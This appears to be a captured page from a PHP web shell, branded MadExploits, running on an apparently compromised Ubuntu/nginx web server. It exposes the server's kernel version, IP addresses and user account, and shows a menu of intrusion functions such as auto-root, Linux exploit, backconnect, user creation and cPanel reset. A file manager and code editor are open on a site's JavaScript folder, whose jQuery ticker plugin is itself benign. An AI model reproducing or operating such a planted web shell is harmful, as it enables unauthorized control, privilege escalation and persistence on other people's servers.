Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
app /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.js
48.44
KB
-rw-rw-r--
breakingNews.js
5.47
KB
-rw-rw-r--
jquery-3.2.1.min.js
84.63
KB
-rw-rw-r--
jquery.bootstrap.newsbox.min.j...
5.14
KB
-rw-rw-r--
jquery.nivo.slider.js
29.08
KB
-rw-rw-r--
jquery.simpleTicker.js
4.33
KB
-rw-rw-r--
optionswitcher.js
1.75
KB
-rw-rw-r--
slick.min.js
40.99
KB
-rw-rw-r--
vertical.slider.js
3.78
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.simpleTicker.js
/** * jQuery simple Ticker plugin * * Copyright (c) 2012 miraoto * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * */ /** * ticker plugin * * @name $.simpleTiecker(); * @cat Plugins/Preload * @author miraoto * * @example $.simpleTiecker(); * @desc default setting */ (function($) { $.simpleTicker =function(element, options) { var defaults = { speed : 1000, delay : 3000, easing : 'swing', effectType : 'slide' } var param = { 'ul' : '', 'li' : '', 'initList' : '', 'ulWidth' : '', 'liHeight' : '', 'tickerHook' : 'tickerHook', 'effect' : {} } var plugin = this; plugin.settings = {} var $element = $(element), element = element; plugin.init = function() { plugin.settings = $.extend({}, defaults, options); param.ul = element.children('ul'); param.li = element.find('li'); param.initList = element.find('li:first'); param.ulWidth = param.ul.width(); param.liHeight = param.li.height(); element.css({height:(param.liHeight)}); param.li.css({top:'',left:'',position:'absolute'}); //dispatch switch (plugin.settings.effectType) { case 'fade': plugin.effect.fade(); break; case 'roll': plugin.effect.roll(); break; case 'slide': plugin.effect.slide(); break; } plugin.effect.exec(); } plugin.effect = {}; plugin.effect.exec = function() { param.initList.css(param.effect.init.css) .animate(param.effect.init.animate,plugin.settings.speed,plugin.settings.easing) .addClass(param.tickerHook); if (element.find(param.li).length > 1) { setInterval(function(){ element.find('.' + param.tickerHook) .animate(param.effect.start.animate,plugin.settings.speed,plugin.settings.easing) .next() .css(param.effect.next.css) .animate(param.effect.next.animate,plugin.settings.speed,plugin.settings.easing) .addClass(param.tickerHook) .end() .appendTo(param.ul) .css(param.effect.end.css) .removeClass(param.tickerHook); },plugin.settings.delay); } } plugin.effect.fade = function() { param.effect = { 'init' : { 'css' : {display:'block',opacity:'0'}, 'animate' : {opacity:'1',zIndex:'98'} }, 'start' : { 'animate' : {opacity:'0'} }, 'next' : { 'css' : {display:'block',opacity:'0',zIndex:'99'}, 'animate' : {opacity:'1'} }, 'end' : { 'css' : {display:'none',zIndex:'98'} } } } plugin.effect.roll = function() { param.effect = { 'init' : { 'css' : {top:'3em',display:'block',opacity:'0'}, 'animate' : {top:'0',opacity:'1',zIndex:'98'} }, 'start' : { 'animate' : {top:'-3em',opacity:'0'} }, 'next' : { 'css' : {top:'3em',display:'block',opacity:'0',zIndex:'99'}, 'animate' : {top:'0',opacity:'1'} }, 'end' : { 'css' : {zIndex:'98'} } } } plugin.effect.slide = function() { param.effect = { 'init' : { 'css' : {left:(200),display:'block',opacity:'0'}, 'animate' : {left:'0',opacity:'1',zIndex:'98'} }, 'start' : { 'animate' : {left:(-(200)),opacity:'0'} }, 'next' : { 'css' : {left:(param.ulWidth),display:'block',opacity:'0',zIndex:'99'}, 'animate' : {left:'0',opacity:'1'} }, 'end' : { 'css' : {zIndex:'98'} } } } plugin.init(); } $.fn.simpleTicker = function(options) { return this.each(function() { if (undefined == $(this).data('simpleTicker')) { var plugin = new $.simpleTiecker(this, options); $(this).data('simpleTicker', plugin); } }); } })(jQuery);
Close